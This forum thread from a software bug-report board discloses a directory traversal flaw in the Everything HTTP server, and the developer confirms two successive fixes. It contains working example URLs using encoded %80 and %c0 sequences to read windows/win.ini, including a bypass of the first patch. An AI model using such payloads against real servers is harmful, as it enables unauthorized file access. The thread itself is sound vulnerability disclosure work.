Vulnerability on Everything HTTP server (directory traversal)

Found a bug in "Everything"? report it here
Post Reply
Silver
Posts: 2
Joined: Tue May 09, 2023 9:11 am

Vulnerability on Everything HTTP server (directory traversal)

Post by Silver »

Everything version 1.5.0.1345a

A critical vulnerability exists when using the Everything HTTP server.

The web server allows directory traversal. (Web Server Directory Traversal Arbitrary File Access)
Example: [EverythingURL]/%80../%80../%80../%80../%80../%80../windows/win.ini (Access allowed)
void
Developer
Posts: 16929
Joined: Fri Oct 16, 2009 11:31 pm

Re: Vulnerability on Everything HTTP server (directory traversal)

Post by void »

Thank you for the security issue report Silver,

Everything-1.4.1.1023 and Everything 1.5.0.1346a fixes an issue with Everything ignoring the invalid %80 character.
Silver
Posts: 2
Joined: Tue May 09, 2023 9:11 am

Re: Vulnerability on Everything HTTP server (directory traversal)

Post by Silver »

Thank you for the quick response to the request. Unfortunately, this did not completely solve the problem.

It is still possible to get access via other characters. Example:
[EverythingURL]/%c0.%c0./%c0.%c0./%c0.%c0./%c0.%c0./%c0.%c0./windows/win.ini
void
Developer
Posts: 16929
Joined: Fri Oct 16, 2009 11:31 pm

Re: Vulnerability on Everything HTTP server (directory traversal)

Post by void »

Thank you for the security issue report Silver,

Everything-1.4.1.1024 and Everything 1.5.0.1347a fixes an issue with utf8 => wchar injected relative paths.
Post Reply